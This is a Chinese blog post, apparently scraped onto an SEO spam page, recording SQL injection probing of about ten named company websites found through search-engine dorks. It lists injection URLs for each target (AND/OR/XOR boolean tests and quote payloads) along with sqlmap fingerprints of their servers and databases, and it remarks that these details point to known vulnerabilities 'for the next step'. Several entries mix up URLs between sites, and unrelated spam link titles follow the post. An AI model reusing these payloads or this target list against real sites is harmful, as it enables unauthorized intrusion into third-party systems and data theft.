当前位置: 首页 > news >正文

做外贸网站的经验优秀软文范例200字

做外贸网站的经验,优秀软文范例200字,网站模版网,电脑最常用的绘图软件有哪些1、目标:inurl:news.php?id URL:https://www.lghk.com/news.php?id5 网站标题:趋时珠宝首饰有限公司 手工基础判断: And用法 and 11: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 11的返回结果必定是和正常页…

1、目标:inurl:news.php?id=  

URL:https://www.lghk.com/news.php?id=5

网站标题:趋时珠宝首饰有限公司

手工基础判断:

And用法

and 1=1: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 1=1的返回结果必定是和正常页面时是完全一致的

and 1=2返回为假, 会强行吧整个查询条件建立成假. 导致查询无数据, 因此页面内容会和正常页面不同.

原始网页:https://www.lghk.com/news.php?id=5

构造url1:https://www.lghk.com/news.php?id=5 AND 1=1

         3664bd618836d86e3e278b3336b9e524.png

构造url2:https://www.lghk.com/news.php?id=5 AND 1=2

1b41eee752875b0f10c16547b190a5b3.png

如果url1访问结果跟原始网页一致,而url2跟原始网页不一致,有出错信息或者显示内容不一致,则证明存在SQL注入。

or用法:只要有一个为真,那么整条语句都是真

构造url1:https://www.lghk.com/news.php?id=5 or 1=1    正常页面只有News(会显示News, Awards & Cert.)

构造url2:https://www.lghk.com/news.php?id=5 or 1=2    正常页面只有News(会显示News, Awards & Cert.)

b3517cccc8e9807a28f404df3ee2658e.png

xor用法:同为真同为假,那就是假;一真一假才为真

构造url1:https://www.lghk.com/news.php?id=5 xor 1=1  (显示正常,全部数据都给)

构造url2:https://www.lghk.com/news.php?id=5 xor 1=2   (显示正常,全部数据都给)

字符串类型判断

单引号

构造url1:https://www.lghk.com/news.php?id=5’  (输入单引号会显示报错,后端代码可能有问题 )

8cb98f7486ac00208cc8add83fb2fb5a.png

双引号

构造url1:https://www.lghk.com/news.php?id=”5”(显示页面正常 )

39b209079b4543905613dfe2e2df1e29.png

Sqlmap检测:使用工具来跑可以看到存在多种注入,可以看到这个网站的应用信息,web应用技术:Nginx,PHP 7.4.33

后端DBMS:MySQL>=5.0(MariaDB fork)

1978763935ae4351e539503810c816aa.png

2、目标:inurl:news.php?id=  

URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

33184ad937d103dc7d363f2ad54c51a1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=2 (显示报错页面这通常表示可能存在 SQL 注入漏洞)

ca0790d0efb1a385884f2c38e73d970a.png

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 (显示1的页面,页面页发生了变化)

字符串类型判断

单引号

构造url1:https://www.lghk.com/news.php?id=5’  (输入单引号会显示报错,后端代码可能有问题 )

6a9c6e8dd89f75449fb11e23608ba458.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=2 (页面没发生变化)

08ab03e2a3d3a646f6c11fbb8c253a7a.png

xor用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=1 (显示1的页面,页面页发生了变化)

d806de92afe552447a93b4c927c4beef.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=2 (页面没发生了变化)

82dc8671b2e67bc7fa46e265562ce416.png

字符串类型判断

单引号

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3’  (输入单引号会显示报错,后端代码可能有问题 )

e3dfc516e313b649fe8f5769f6508fb9.png双引号

构造url1:http://www.xiatech.com.cn/aboutus.asp?”id=”5”(显示错误 )

307023741a15e5d7ab0ee1854f2e9fa2.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

e4119b24a72460d6528390f1a978e09f.png

09ee00bcb88ce1c4004a43604ed0f592.png

3、目标:inurl:news.php?id=  

URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

e64666e49fbfe3e3e7c9f579a83bf1c3.png

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1   or 1+=2(页面显示正常)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 2012 r2 or 8.1

中间件是 PHP 5.4.45, Microsoft IIS 8.5

数据库是MySQL5.0

(知道这些信息我们可以查找历史漏洞进行下一步操作)

174d97358df7c7dd07d59cca326607b7.png

4、目标:inurl:asp?id=  

URL:http://www.jgbr.com.cn/ShowProduct.asp?ID=217

网站标题:江苏力星通用钢球股份有限公司

手工基础判断:

And用法

构造url1:http://www.jgbr.com.cn/ShowProduct.asp?ID=217 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

1703f4d0d744c106ed3aef332d622950.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

60b06b9c42f8852ebbda6c332d8ba5df.png

5、目标:inurl:asp?id=  

URL:http://www.hosen.cn/product.php?pid=500

网站标题:南京浩晃科技有限公司

手工基础判断:

And用法

构造url1:http://www.hosen.cn/product.php?pid=500 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

ffd58837e1686b121cc059a538b82a08.png

构造url2:http://www.hosen.cn/product.php?pid=500 AND+1=2 (报错页面可能存在 SQL 注入漏洞)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

网站信息:PHP 5.4.26, Nginx

(知道这些信息我们可以查找历史漏洞进行下一步操作)

07670e54eca7a7082b8703a78e009d69.png

6、目标:inurl:asp?id=  

URL:http://www.cuc-china.net/about.asp?id=124

网站标题:世优认证 (上海)有限公司

手工基础判断:

And用法

构造url1:http://www.cuc-china.net/about.asp?id=124 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

2cc6beb1e8190a0131055d14db48698f.png

构造url2:http://www.cuc-china.net/about.asp?id=124 AND+1=2(报错页面可能存在 SQL 注入漏洞)

4898d0e5dc64e58e1111930842b0d6de.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 7或2008 R2

web应用技术:Microsoft IIS 7.5、ASP、ASP。NET

后端DBMS:Microsoft Access (知道这些信息我们可以查找历史漏洞进行下一步操作)

99d965c6a75341a93fc87159454c80c5.png

7、目标:inurl:asp?id=  

URL:http://www.ywbaili.com/news.php?id=1

网站标题:百利飞镖

手工基础判断:

And用法

构造url1:http://www.ywbaili.com/news.php?id=1 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

f329ff6237d774bef635636c72834dd4.png

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

9f293cb83b06e42b75778465e7015f45.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows XP或2003

web应用技术:ASP.NET、Microsoft IIS 6.0

后端DBMS:MySQL>=5.0.12(知道这些信息我们可以查找历史漏洞进行下一步操作)

81759978e9a5b303d81c5681bd7641b8.png

8、目标:inurl:news.php?id=  

URL:https://www.szdwwy.com/service_show.php?id=2

网站标题:东吴服务产业集团 (江苏) 有限公司

And用法

构造url1:https://www.szdwwy.com/service_show.php?id=2 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

2dbbfcc81a5765b89f761baa39570dc8.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

后端DBMS是MySQL

web应用程序技术:Apache

后端DBMS:MySQL>=5.0.12

(知道这些信息我们可以查找历史漏洞进行下一步操作)

ef5092b001a0ddd0f292781ecb5705a3.png

9、目标:inurl:news.php?id=  

URL:http://www.icet.org.cn/news.asp?id=367

网站标题:能源与交通创新中心

And用法

构造url1:http://www.icet.org.cn/news.asp?id=367 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.icet.org.cn/news.asp?id=367 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

0746c4b706735628fa95ff2a301586d7.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 2012或8

web应用程序技术:Microsoft IIS 8.0、ASP.NET、ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

ede3cfbd3351bf2920390920173d1659.png

10、目标:inurl:band_info.php?id=  

URL:http://www.fine-stamping.com/contact.asp?id=10

网站标题:苏州范斯特机械科技有限公司

And用法

构造url1:http://www.fine-stamping.com/contact.asp?id=10 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.fine-stamping.com/contact.asp?id=10 AND+1=2(显示正常页面这通常表示可能存在 SQL 注入漏洞)

字节符

构造url2:http://www.fine-stamping.com/contact.asp?id=10’(显示报错)

1a762aad2a29886d48f78b0fe6231821.png 

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows

web应用技术:ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

c7940275a6892cd58cea70b4ed387699.png

问题:1  

URL:http://www.syyqz.com/lianxi.php?pid=6&id=6

手工测试是有漏洞,但是使用sqlmap跑也是有注入点,但是就是跑不出数据库信息

6875fc04aa40da42c0929a7b80b7f4bf.png

问题:2  

URL:http://www.isriht.com/index.php?id=344

输入了and 1=1 显示下图这样的操作

2d24c65fa2a9f3c39d3602c4eafe39c9.png

http://www.hkea.cn/news/890691/

相关文章:

  • wordpress免费网站世界大学排名
  • 做网站的属于什么专业?百度爱采购竞价推广
  • 网站建设一年多少恰东莞网站到首页排名
  • 新企业网站应该怎么做SEO优化广告联盟有哪些
  • 手机app开发网站建设软文推广文章案例
  • 网站自然排名百度经验官网登录
  • dz网站模板沧州网站优化公司
  • 桂林论坛天涯社区培训行业seo整站优化
  • 做伊瑞尔竞技场的网站搜索引擎简称seo
  • 46云虚拟主机股票发行ipo和seo是什么意思
  • 新泰做网站菏泽seo
  • 网站建设排名东莞seo收费
  • 做网站前后端的发布流程自己如何制作网站
  • 网站营销与推广策略百度一下官网首页百度
  • 网站建设张世勇100个免费推广b站
  • 网络营销的常用工具百度关键词优化点击 教程
  • 公司网站要怎么做少儿编程培训机构排名前十
  • 一个好的网站是什么样的商家联盟营销方案
  • 网站解除域名绑定网站广告收费标准
  • 郑州的建设网站有哪些手续免费发布推广信息的平台有哪些
  • 手机做网站软件优化服务平台
  • 网站图片装修的热切图怎么做营销技巧培训
  • 可以上传图片的网站怎么做百度关键词点击
  • 泉州网站制作广州seo网站开发
  • cuntlove wordpressseo外链发布工具
  • 购买一个网站空间如何可以多个域名使用吗长沙网站建设服务
  • 天津市建设委员会网站上海网站制作开发
  • 扬中网站建设墨子学院seo
  • 分析电子商务网站建设需求教案青岛今天发生的重大新闻
  • 汕头模板开发建站百度发布信息怎么弄